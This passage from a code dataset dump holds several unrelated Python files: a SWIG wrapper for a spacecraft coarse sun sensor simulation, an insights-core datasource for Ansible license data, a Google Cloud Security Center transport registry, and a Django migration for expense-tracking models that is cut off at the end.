_swig_property(_coarse_sun_sensor.CoarseSunSensor_directValue_get, _coarse_sun_sensor.CoarseSunSensor_directValue_set)\n __swig_setmethods__[\"albedoValue\"] = _coarse_sun_sensor.CoarseSunSensor_albedoValue_set\n __swig_getmethods__[\"albedoValue\"] = _coarse_sun_sensor.CoarseSunSensor_albedoValue_get\n if _newclass:\n albedoValue = _swig_property(_coarse_sun_sensor.CoarseSunSensor_albedoValue_get, _coarse_sun_sensor.CoarseSunSensor_albedoValue_set)\n __swig_setmethods__[\"scaleFactor\"] = _coarse_sun_sensor.CoarseSunSensor_scaleFactor_set\n __swig_getmethods__[\"scaleFactor\"] = _coarse_sun_sensor.CoarseSunSensor_scaleFactor_get\n if _newclass:\n scaleFactor = _swig_property(_coarse_sun_sensor.CoarseSunSensor_scaleFactor_get, _coarse_sun_sensor.CoarseSunSensor_scaleFactor_set)\n __swig_setmethods__[\"sensedValue\"] = _coarse_sun_sensor.CoarseSunSensor_sensedValue_set\n __swig_getmethods__[\"sensedValue\"] = _coarse_sun_sensor.CoarseSunSensor_sensedValue_get\n if _newclass:\n sensedValue = _swig_property(_coarse_sun_sensor.CoarseSunSensor_sensedValue_get, _coarse_sun_sensor.CoarseSunSensor_sensedValue_set)\n __swig_setmethods__[\"trueValue\"] = _coarse_sun_sensor.CoarseSunSensor_trueValue_set\n __swig_getmethods__[\"trueValue\"] = _coarse_sun_sensor.CoarseSunSensor_trueValue_get\n if _newclass:\n trueValue = _swig_property(_coarse_sun_sensor.CoarseSunSensor_trueValue_get, _coarse_sun_sensor.CoarseSunSensor_trueValue_set)\n __swig_setmethods__[\"kellyFactor\"] = _coarse_sun_sensor.CoarseSunSensor_kellyFactor_set\n __swig_getmethods__[\"kellyFactor\"] = _coarse_sun_sensor.CoarseSunSensor_kellyFactor_get\n if _newclass:\n kellyFactor = _swig_property(_coarse_sun_sensor.CoarseSunSensor_kellyFactor_get, _coarse_sun_sensor.CoarseSunSensor_kellyFactor_set)\n __swig_setmethods__[\"fov\"] = _coarse_sun_sensor.CoarseSunSensor_fov_set\n __swig_getmethods__[\"fov\"] = _coarse_sun_sensor.CoarseSunSensor_fov_get\n if _newclass:\n fov = _swig_property(_coarse_sun_sensor.CoarseSunSensor_fov_get, _coarse_sun_sensor.CoarseSunSensor_fov_set)\n __swig_setmethods__[\"r_B\"] = _coarse_sun_sensor.CoarseSunSensor_r_B_set\n __swig_getmethods__[\"r_B\"] = _coarse_sun_sensor.CoarseSunSensor_r_B_get\n if _newclass:\n r_B = _swig_property(_coarse_sun_sensor.CoarseSunSensor_r_B_get, _coarse_sun_sensor.CoarseSunSensor_r_B_set)\n __swig_setmethods__[\"senBias\"] = _coarse_sun_sensor.CoarseSunSensor_senBias_set\n __swig_getmethods__[\"senBias\"] = _coarse_sun_sensor.CoarseSunSensor_senBias_get\n if _newclass:\n senBias = _swig_property(_coarse_sun_sensor.CoarseSunSensor_senBias_get, _coarse_sun_sensor.CoarseSunSensor_senBias_set)\n __swig_setmethods__[\"senNoiseStd\"] = _coarse_sun_sensor.CoarseSunSensor_senNoiseStd_set\n __swig_getmethods__[\"senNoiseStd\"] = _coarse_sun_sensor.CoarseSunSensor_senNoiseStd_get\n if _newclass:\n senNoiseStd = _swig_property(_coarse_sun_sensor.CoarseSunSensor_senNoiseStd_get, _coarse_sun_sensor.CoarseSunSensor_senNoiseStd_set)\n __swig_setmethods__[\"outputBufferCount\"] = _coarse_sun_sensor.CoarseSunSensor_outputBufferCount_set\n __swig_getmethods__[\"outputBufferCount\"] = _coarse_sun_sensor.CoarseSunSensor_outputBufferCount_get\n if _newclass:\n outputBufferCount = _swig_property(_coarse_sun_sensor.CoarseSunSensor_outputBufferCount_get, _coarse_sun_sensor.CoarseSunSensor_outputBufferCount_set)\n __swig_setmethods__[\"maxOutput\"] = _coarse_sun_sensor.CoarseSunSensor_maxOutput_set\n __swig_getmethods__[\"maxOutput\"] = _coarse_sun_sensor.CoarseSunSensor_maxOutput_get\n if _newclass:\n 
maxOutput = _swig_property(_coarse_sun_sensor.CoarseSunSensor_maxOutput_get, _coarse_sun_sensor.CoarseSunSensor_maxOutput_set)\n __swig_setmethods__[\"minOutput\"] = _coarse_sun_sensor.CoarseSunSensor_minOutput_set\n __swig_getmethods__[\"minOutput\"] = _coarse_sun_sensor.CoarseSunSensor_minOutput_get\n if _newclass:\n minOutput = _swig_property(_coarse_sun_sensor.CoarseSunSensor_minOutput_get, _coarse_sun_sensor.CoarseSunSensor_minOutput_set)\n __swig_setmethods__[\"walkBounds\"] = _coarse_sun_sensor.CoarseSunSensor_walkBounds_set\n __swig_getmethods__[\"walkBounds\"] = _coarse_sun_sensor.CoarseSunSensor_walkBounds_get\n if _newclass:\n walkBounds = _swig_property(_coarse_sun_sensor.CoarseSunSensor_walkBounds_get, _coarse_sun_sensor.CoarseSunSensor_walkBounds_set)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_CoarseSunSensor(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\nCoarseSunSensor_swigregister = _coarse_sun_sensor.CoarseSunSensor_swigregister\nCoarseSunSensor_swigregister(CoarseSunSensor)\n\nclass CSSConstellation(SysModel):\n __swig_setmethods__ = {}\n for _s in [SysModel]:\n __swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))\n __setattr__ = lambda self, name, value: _swig_setattr(self, CSSConstellation, name, value)\n __swig_getmethods__ = {}\n for _s in [SysModel]:\n __swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))\n __getattr__ = lambda self, name: _swig_getattr(self, CSSConstellation, name)\n __repr__ = _swig_repr\n __swig_destroy__ = _coarse_sun_sensor.delete_CSSConstellation\n __del__ = lambda self: None\n\n def CrossInit(self):\n return _coarse_sun_sensor.CSSConstellation_CrossInit(self)\n\n def SelfInit(self):\n return _coarse_sun_sensor.CSSConstellation_SelfInit(self)\n\n def UpdateState(self, CurrentSimNanos):\n return _coarse_sun_sensor.CSSConstellation_UpdateState(self, CurrentSimNanos)\n\n def appendCSS(self, newSensor):\n return _coarse_sun_sensor.CSSConstellation_appendCSS(self, newSensor)\n __swig_setmethods__[\"outputBufferCount\"] = _coarse_sun_sensor.CSSConstellation_outputBufferCount_set\n __swig_getmethods__[\"outputBufferCount\"] = _coarse_sun_sensor.CSSConstellation_outputBufferCount_get\n if _newclass:\n outputBufferCount = _swig_property(_coarse_sun_sensor.CSSConstellation_outputBufferCount_get, _coarse_sun_sensor.CSSConstellation_outputBufferCount_set)\n __swig_setmethods__[\"outputConstellationMessage\"] = _coarse_sun_sensor.CSSConstellation_outputConstellationMessage_set\n __swig_getmethods__[\"outputConstellationMessage\"] = _coarse_sun_sensor.CSSConstellation_outputConstellationMessage_get\n if _newclass:\n outputConstellationMessage = _swig_property(_coarse_sun_sensor.CSSConstellation_outputConstellationMessage_get, _coarse_sun_sensor.CSSConstellation_outputConstellationMessage_set)\n __swig_setmethods__[\"outputConstID\"] = _coarse_sun_sensor.CSSConstellation_outputConstID_set\n __swig_getmethods__[\"outputConstID\"] = _coarse_sun_sensor.CSSConstellation_outputConstID_get\n if _newclass:\n outputConstID = _swig_property(_coarse_sun_sensor.CSSConstellation_outputConstID_get, _coarse_sun_sensor.CSSConstellation_outputConstID_set)\n __swig_setmethods__[\"sensorList\"] = _coarse_sun_sensor.CSSConstellation_sensorList_set\n __swig_getmethods__[\"sensorList\"] = _coarse_sun_sensor.CSSConstellation_sensorList_get\n if _newclass:\n sensorList = _swig_property(_coarse_sun_sensor.CSSConstellation_sensorList_get, _coarse_sun_sensor.CSSConstellation_sensorList_set)\n\n 
def __init__(self, *args):\n this = _coarse_sun_sensor.new_CSSConstellation(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\nCSSConstellation_swigregister = _coarse_sun_sensor.CSSConstellation_swigregister\nCSSConstellation_swigregister(CSSConstellation)\n\nclass SCPlusStatesSimMsg(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, SCPlusStatesSimMsg, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, SCPlusStatesSimMsg, name)\n __repr__ = _swig_repr\n __swig_setmethods__[\"r_BN_N\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_r_BN_N_set\n __swig_getmethods__[\"r_BN_N\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_r_BN_N_get\n if _newclass:\n r_BN_N = _swig_property(_coarse_sun_sensor.SCPlusStatesSimMsg_r_BN_N_get, _coarse_sun_sensor.SCPlusStatesSimMsg_r_BN_N_set)\n __swig_setmethods__[\"v_BN_N\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_v_BN_N_set\n __swig_getmethods__[\"v_BN_N\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_v_BN_N_get\n if _newclass:\n v_BN_N = _swig_property(_coarse_sun_sensor.SCPlusStatesSimMsg_v_BN_N_get, _coarse_sun_sensor.SCPlusStatesSimMsg_v_BN_N_set)\n __swig_setmethods__[\"r_CN_N\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_r_CN_N_set\n __swig_getmethods__[\"r_CN_N\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_r_CN_N_get\n if _newclass:\n r_CN_N = _swig_property(_coarse_sun_sensor.SCPlusStatesSimMsg_r_CN_N_get, _coarse_sun_sensor.SCPlusStatesSimMsg_r_CN_N_set)\n __swig_setmethods__[\"v_CN_N\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_v_CN_N_set\n __swig_getmethods__[\"v_CN_N\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_v_CN_N_get\n if _newclass:\n v_CN_N = _swig_property(_coarse_sun_sensor.SCPlusStatesSimMsg_v_CN_N_get, _coarse_sun_sensor.SCPlusStatesSimMsg_v_CN_N_set)\n __swig_setmethods__[\"sigma_BN\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_sigma_BN_set\n __swig_getmethods__[\"sigma_BN\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_sigma_BN_get\n if _newclass:\n sigma_BN = _swig_property(_coarse_sun_sensor.SCPlusStatesSimMsg_sigma_BN_get, _coarse_sun_sensor.SCPlusStatesSimMsg_sigma_BN_set)\n __swig_setmethods__[\"omega_BN_B\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_omega_BN_B_set\n __swig_getmethods__[\"omega_BN_B\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_omega_BN_B_get\n if _newclass:\n omega_BN_B = _swig_property(_coarse_sun_sensor.SCPlusStatesSimMsg_omega_BN_B_get, _coarse_sun_sensor.SCPlusStatesSimMsg_omega_BN_B_set)\n __swig_setmethods__[\"omegaDot_BN_B\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_omegaDot_BN_B_set\n __swig_getmethods__[\"omegaDot_BN_B\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_omegaDot_BN_B_get\n if _newclass:\n omegaDot_BN_B = _swig_property(_coarse_sun_sensor.SCPlusStatesSimMsg_omegaDot_BN_B_get, _coarse_sun_sensor.SCPlusStatesSimMsg_omegaDot_BN_B_set)\n __swig_setmethods__[\"TotalAccumDVBdy\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_TotalAccumDVBdy_set\n __swig_getmethods__[\"TotalAccumDVBdy\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_TotalAccumDVBdy_get\n if _newclass:\n TotalAccumDVBdy = _swig_property(_coarse_sun_sensor.SCPlusStatesSimMsg_TotalAccumDVBdy_get, _coarse_sun_sensor.SCPlusStatesSimMsg_TotalAccumDVBdy_set)\n __swig_setmethods__[\"TotalAccumDV_BN_B\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_TotalAccumDV_BN_B_set\n __swig_getmethods__[\"TotalAccumDV_BN_B\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_TotalAccumDV_BN_B_get\n if _newclass:\n TotalAccumDV_BN_B = 
_swig_property(_coarse_sun_sensor.SCPlusStatesSimMsg_TotalAccumDV_BN_B_get, _coarse_sun_sensor.SCPlusStatesSimMsg_TotalAccumDV_BN_B_set)\n __swig_setmethods__[\"nonConservativeAccelpntB_B\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_nonConservativeAccelpntB_B_set\n __swig_getmethods__[\"nonConservativeAccelpntB_B\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_nonConservativeAccelpntB_B_get\n if _newclass:\n nonConservativeAccelpntB_B = _swig_property(_coarse_sun_sensor.SCPlusStatesSimMsg_nonConservativeAccelpntB_B_get, _coarse_sun_sensor.SCPlusStatesSimMsg_nonConservativeAccelpntB_B_set)\n __swig_setmethods__[\"MRPSwitchCount\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_MRPSwitchCount_set\n __swig_getmethods__[\"MRPSwitchCount\"] = _coarse_sun_sensor.SCPlusStatesSimMsg_MRPSwitchCount_get\n if _newclass:\n MRPSwitchCount = _swig_property(_coarse_sun_sensor.SCPlusStatesSimMsg_MRPSwitchCount_get, _coarse_sun_sensor.SCPlusStatesSimMsg_MRPSwitchCount_set)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_SCPlusStatesSimMsg(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n __swig_destroy__ = _coarse_sun_sensor.delete_SCPlusStatesSimMsg\n __del__ = lambda self: None\nSCPlusStatesSimMsg_swigregister = _coarse_sun_sensor.SCPlusStatesSimMsg_swigregister\nSCPlusStatesSimMsg_swigregister(SCPlusStatesSimMsg)\n\nMAX_BODY_NAME_LENGTH = _coarse_sun_sensor.MAX_BODY_NAME_LENGTH\nclass SpicePlanetStateSimMsg(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, SpicePlanetStateSimMsg, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, SpicePlanetStateSimMsg, name)\n __repr__ = _swig_repr\n __swig_setmethods__[\"J2000Current\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_J2000Current_set\n __swig_getmethods__[\"J2000Current\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_J2000Current_get\n if _newclass:\n J2000Current = _swig_property(_coarse_sun_sensor.SpicePlanetStateSimMsg_J2000Current_get, _coarse_sun_sensor.SpicePlanetStateSimMsg_J2000Current_set)\n __swig_setmethods__[\"PositionVector\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_PositionVector_set\n __swig_getmethods__[\"PositionVector\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_PositionVector_get\n if _newclass:\n PositionVector = _swig_property(_coarse_sun_sensor.SpicePlanetStateSimMsg_PositionVector_get, _coarse_sun_sensor.SpicePlanetStateSimMsg_PositionVector_set)\n __swig_setmethods__[\"VelocityVector\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_VelocityVector_set\n __swig_getmethods__[\"VelocityVector\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_VelocityVector_get\n if _newclass:\n VelocityVector = _swig_property(_coarse_sun_sensor.SpicePlanetStateSimMsg_VelocityVector_get, _coarse_sun_sensor.SpicePlanetStateSimMsg_VelocityVector_set)\n __swig_setmethods__[\"J20002Pfix\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_J20002Pfix_set\n __swig_getmethods__[\"J20002Pfix\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_J20002Pfix_get\n if _newclass:\n J20002Pfix = _swig_property(_coarse_sun_sensor.SpicePlanetStateSimMsg_J20002Pfix_get, _coarse_sun_sensor.SpicePlanetStateSimMsg_J20002Pfix_set)\n __swig_setmethods__[\"J20002Pfix_dot\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_J20002Pfix_dot_set\n __swig_getmethods__[\"J20002Pfix_dot\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_J20002Pfix_dot_get\n if _newclass:\n J20002Pfix_dot = _swig_property(_coarse_sun_sensor.SpicePlanetStateSimMsg_J20002Pfix_dot_get, 
_coarse_sun_sensor.SpicePlanetStateSimMsg_J20002Pfix_dot_set)\n __swig_setmethods__[\"computeOrient\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_computeOrient_set\n __swig_getmethods__[\"computeOrient\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_computeOrient_get\n if _newclass:\n computeOrient = _swig_property(_coarse_sun_sensor.SpicePlanetStateSimMsg_computeOrient_get, _coarse_sun_sensor.SpicePlanetStateSimMsg_computeOrient_set)\n __swig_setmethods__[\"PlanetName\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_PlanetName_set\n __swig_getmethods__[\"PlanetName\"] = _coarse_sun_sensor.SpicePlanetStateSimMsg_PlanetName_get\n if _newclass:\n PlanetName = _swig_property(_coarse_sun_sensor.SpicePlanetStateSimMsg_PlanetName_get, _coarse_sun_sensor.SpicePlanetStateSimMsg_PlanetName_set)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_SpicePlanetStateSimMsg(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n __swig_destroy__ = _coarse_sun_sensor.delete_SpicePlanetStateSimMsg\n __del__ = lambda self: None\nSpicePlanetStateSimMsg_swigregister = _coarse_sun_sensor.SpicePlanetStateSimMsg_swigregister\nSpicePlanetStateSimMsg_swigregister(SpicePlanetStateSimMsg)\n\nclass CSSRawDataSimMsg(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, CSSRawDataSimMsg, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, CSSRawDataSimMsg, name)\n __repr__ = _swig_repr\n __swig_setmethods__[\"OutputData\"] = _coarse_sun_sensor.CSSRawDataSimMsg_OutputData_set\n __swig_getmethods__[\"OutputData\"] = _coarse_sun_sensor.CSSRawDataSimMsg_OutputData_get\n if _newclass:\n OutputData = _swig_property(_coarse_sun_sensor.CSSRawDataSimMsg_OutputData_get, _coarse_sun_sensor.CSSRawDataSimMsg_OutputData_set)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_CSSRawDataSimMsg(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n __swig_destroy__ = _coarse_sun_sensor.delete_CSSRawDataSimMsg\n __del__ = lambda self: None\nCSSRawDataSimMsg_swigregister = _coarse_sun_sensor.CSSRawDataSimMsg_swigregister\nCSSRawDataSimMsg_swigregister(CSSRawDataSimMsg)\n\nclass EclipseSimMsg(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, EclipseSimMsg, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, EclipseSimMsg, name)\n __repr__ = _swig_repr\n __swig_setmethods__[\"shadowFactor\"] = _coarse_sun_sensor.EclipseSimMsg_shadowFactor_set\n __swig_getmethods__[\"shadowFactor\"] = _coarse_sun_sensor.EclipseSimMsg_shadowFactor_get\n if _newclass:\n shadowFactor = _swig_property(_coarse_sun_sensor.EclipseSimMsg_shadowFactor_get, _coarse_sun_sensor.EclipseSimMsg_shadowFactor_set)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_EclipseSimMsg(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n __swig_destroy__ = _coarse_sun_sensor.delete_EclipseSimMsg\n __del__ = lambda self: None\nEclipseSimMsg_swigregister = _coarse_sun_sensor.EclipseSimMsg_swigregister\nEclipseSimMsg_swigregister(EclipseSimMsg)\n\nclass CSSArraySensorIntMsg(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, CSSArraySensorIntMsg, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, CSSArraySensorIntMsg, name)\n __repr__ = _swig_repr\n 
__swig_setmethods__[\"CosValue\"] = _coarse_sun_sensor.CSSArraySensorIntMsg_CosValue_set\n __swig_getmethods__[\"CosValue\"] = _coarse_sun_sensor.CSSArraySensorIntMsg_CosValue_get\n if _newclass:\n CosValue = _swig_property(_coarse_sun_sensor.CSSArraySensorIntMsg_CosValue_get, _coarse_sun_sensor.CSSArraySensorIntMsg_CosValue_set)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_CSSArraySensorIntMsg(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n __swig_destroy__ = _coarse_sun_sensor.delete_CSSArraySensorIntMsg\n __del__ = lambda self: None\nCSSArraySensorIntMsg_swigregister = _coarse_sun_sensor.CSSArraySensorIntMsg_swigregister\nCSSArraySensorIntMsg_swigregister(CSSArraySensorIntMsg)\n\nsizeof_CSSRawDataSimMsg = _coarse_sun_sensor.sizeof_CSSRawDataSimMsg\nsizeof_EclipseSimMsg = _coarse_sun_sensor.sizeof_EclipseSimMsg\nsizeof_CSSArraySensorIntMsg = _coarse_sun_sensor.sizeof_CSSArraySensorIntMsg\nsizeof_SpicePlanetStateSimMsg = _coarse_sun_sensor.sizeof_SpicePlanetStateSimMsg\nsizeof_SCPlusStatesSimMsg = _coarse_sun_sensor.sizeof_SCPlusStatesSimMsg\n\nimport sys\nprotectAllClasses(sys.modules[__name__])\n\n# This file is compatible with both classic and new-style classes.\n\n\n"} {"ext": "py", "sha": "1a2f343b727bcfb94c084c89c7d59ea6577e7319", "content": "\"\"\"\nCustom datasources for awx_manage information\n\"\"\"\nfrom insights.core.context import HostContext\nfrom insights.core.dr import SkipComponent\nfrom insights.core.plugins import datasource\nfrom insights.core.spec_factory import DatasourceProvider, simple_command\nfrom insights.core.filters import get_filters\nfrom insights.specs import Specs\nimport json\nimport collections\n\n\nclass LocalSpecs(Specs):\n \"\"\" Local specs used only by awx_manage datasources \"\"\"\n\n awx_manage_check_license_data_raw = simple_command(\"/usr/bin/awx-manage check_license --data\")\n \"\"\" Returns the output of command ``/usr/bin/awx-manage check_license --data`` \"\"\"\n\n\n@datasource(LocalSpecs.awx_manage_check_license_data_raw, HostContext)\ndef awx_manage_check_license_data_datasource(broker):\n \"\"\"\n This datasource provides the not-sensitive information collected\n from ``/usr/bin/awx-manage check_license --data``.\n\n Typical content of ``/usr/bin/awx-manage check_license --data`` file is::\n\n {\"contact_email\": \"test@redhat.com\", \"company_name\": \"test Inc\", \"instance_count\": 100, \"license_date\": 1655092799, \"license_type\": \"enterprise\", \"subscription_name\": \"Red Hat Ansible Automation, Standard (100 Managed Nodes)\", \"sku\": \"MCT3691\", \"support_level\": \"Standard\", \"product_name\": \"Red Hat Ansible Automation Platform\", \"valid_key\": true, \"satellite\": null, \"pool_id\": \"2c92808179803e530179ea5989a157a4\", \"current_instances\": 1, \"available_instances\": 100, \"free_instances\": 99, \"time_remaining\": 29885220, \"trial\": false, \"grace_period_remaining\": 32477220, \"compliant\": true, \"date_warning\": false, \"date_expired\": false}\n\n Returns:\n str: JSON string containing non-sensitive information.\n\n Raises:\n SkipComponent: When the filter/path does not exist or any exception occurs.\n \"\"\"\n try:\n filters = get_filters(Specs.awx_manage_check_license_data)\n content = broker[LocalSpecs.awx_manage_check_license_data_raw].content\n if content and filters:\n json_data = json.loads(content[0])\n filter_result = {}\n for item in filters:\n filter_result[item] = json_data.get(item)\n if filter_result:\n return 
DatasourceProvider(content=json.dumps(collections.OrderedDict(sorted(filter_result.items()))), relative_path='insights_commands/awx-manage_check_license_--data')\n except Exception as e:\n raise SkipComponent(\"Unexpected exception:{e}\".format(e=str(e)))\n raise SkipComponent\n"} {"ext": "py", "sha": "1a2f356a3b1a6c66f35b4a180bfe444be0803637", "content": "# -*- coding: utf-8 -*-\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom collections import OrderedDict\nfrom typing import Dict, Type\n\nfrom .base import SecurityCenterTransport\nfrom .grpc import SecurityCenterGrpcTransport\nfrom .grpc_asyncio import SecurityCenterGrpcAsyncIOTransport\n\n\n# Compile a registry of transports.\n_transport_registry = OrderedDict() # type: Dict[str, Type[SecurityCenterTransport]]\n_transport_registry[\"grpc\"] = SecurityCenterGrpcTransport\n_transport_registry[\"grpc_asyncio\"] = SecurityCenterGrpcAsyncIOTransport\n\n__all__ = (\n \"SecurityCenterTransport\",\n \"SecurityCenterGrpcTransport\",\n \"SecurityCenterGrpcAsyncIOTransport\",\n)\n"} {"ext": "py", "sha": "1a2f357640e44f8e721169a9ad18c8e63b8bd531", "content": "# Generated by Django 3.1.7 on 2021-09-04 16:59\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='BillCategory',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=150, unique=True)),\n ('balance', models.DecimalField(decimal_places=2, default=0, max_digits=20)),\n ],\n options={\n 'verbose_name_plural': '1. Bill Category',\n },\n ),\n migrations.CreateModel(\n name='GenericExpenseCategory',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=150, unique=True)),\n ('balance', models.DecimalField(decimal_places=2, default=0, max_digits=20)),\n ],\n options={\n 'verbose_name_plural': '6. Expense Category',\n },\n ),\n migrations.CreateModel(\n name='PaymentMethod',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=150, unique=True)),\n ],\n options={\n 'verbose_name_plural': '0. Payment Method',\n },\n ),\n migrations.CreateModel(\n name='PayrollCategory',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=150, unique=True)),\n ('balance', models.DecimalField(decimal_places=2, default=0, max_digits=20)),\n ],\n options={\n 'verbose_name_plural': '3. 
Payroll Category',\n },\n ),\n migrations.CreateModel(\n name='Person',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=150, unique=True)),\n ('occupation', models.CharField(blank=True, max_length=100, null=True)),\n ('phone', models.CharField(blank=True, max_length=10, null=True)),\n ('balance', models.DecimalField(decimal_places=2, default=0, max_digits=20)),\n ],\n options={\n 'verbose_name_plural': '4. Persons',\n },\n ),\n migrations.CreateModel(\n name='Payroll',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(blank=True, max_length=100, null=True)),\n ('date_expired', models.DateField()),\n ('final_value', models.DecimalField(decimal_places=2, default=0, max_digits=20)),\n ('paid_value', models.DecimalField(decimal_places=2, default=0, max_digits=20)),\n ('is_paid', models.BooleanField(default=False)),\n ('category', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='category_payroll', to='expenses.payrollcategory')),\n ('payment_method', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='expenses.paymentmethod')),\n ('person', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='person_payroll', to='expenses.person')),\n ],\n options={\n 'verbose_name_plural': '5. Payroll',\n 'ordering': ['-date_expired'],\n },\n ),\n migrations.CreateModel(\n name='GenericExpense',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(blank=True, max_length=100, null=True)),\n ('date_expired', models.DateField()),\n ('final_value', models.DecimalField(decimal_places=2, default=0, max_digits=20)),\n ('paid_value', models.DecimalField(decimal_places=2, default=0, max_digits=20)),\n ('is_paid', models.BooleanField(default=False)),\n ('category', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='category_expenses', to='expenses.genericexpensecategory')),\n ('payment_method', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='expenses.paymentmethod')),\n ],\n options={\n 'verbose_name_plural': '7. Generic Expenses',\n 'ordering': ['-date_expired'],\n },\n ),\n migrations.CreateModel(\n name='Bill',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(blank=True, max_length=100, null=True)),\n ('date_expired', models.DateField()),\n ('final_value', models.DecimalField(decimal_places=2, default=0, max_digits=20)),\n ('paid_value', models.DecimalField(decimal_places=2, default=0, max_digits=20)),\n ('is_paid', models.BooleanField(default=False)),\n ('category', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='bills', to='expenses.billcategory')),\n ('payment_method', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='expenses.paymentmethod')),\n ],\n options={\n 'verbose_name_plural': '2. 
